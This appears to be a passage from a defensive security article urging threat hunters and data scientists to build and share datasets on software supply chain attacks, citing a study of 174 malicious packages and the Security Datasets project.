Building, contributing, and studying large datasets around software supply chain attacks can help organizations elevate their defenses. Hunters and data scientists working together, or dual-hatted individuals, can scour the datasets to uncover new insights that enable better analytics for hunting emerging threats.
For example, in the research paper, "Backstabber’s Knife Collection: A Review of Open-Source Software Supply Chain Attacks," the authors discuss a dataset of 174 malicious software packages that were used in the wild from November 2015 to November 2019. To be clear, these software packages were not examples of coding errors or neglect that led to vulnerabilities being exploited. Rather, they were intentionally malicious and meant to exploit the trust that exists in package repositories.
More than half of the 174 malicious packages aimed to exfiltrate data, and about a third functioned as a dropper to download a second-stage payload. How malicious code is triggered depends on the code and the language. It could be unconditionally launched upon install or runtime; or it could be conditional and only run when certain parameters are met (e.g., not in a sandbox environment, only on certain operating systems, or only when certain hardware is present). Tools like Falco and Package Hunter can help defenders identify malicious packages by monitoring system calls executed during the installation.
More broadly, network defenders need greater access to large datasets on software supply chain attacks—and they can help bring this about. For instance, Roberto Rodriguez and Jose Luis Rodriguez have created "an open-source initiative—Security Datasets project—that contributes malicious and benign datasets, from different platforms, to the infosec community to expedite data analysis and threat research." Their growing project would benefit greatly from datasets surrounding software supply chain attacks. Threat hunters, security researchers, and data scientists should seek opportunities to contribute such datasets.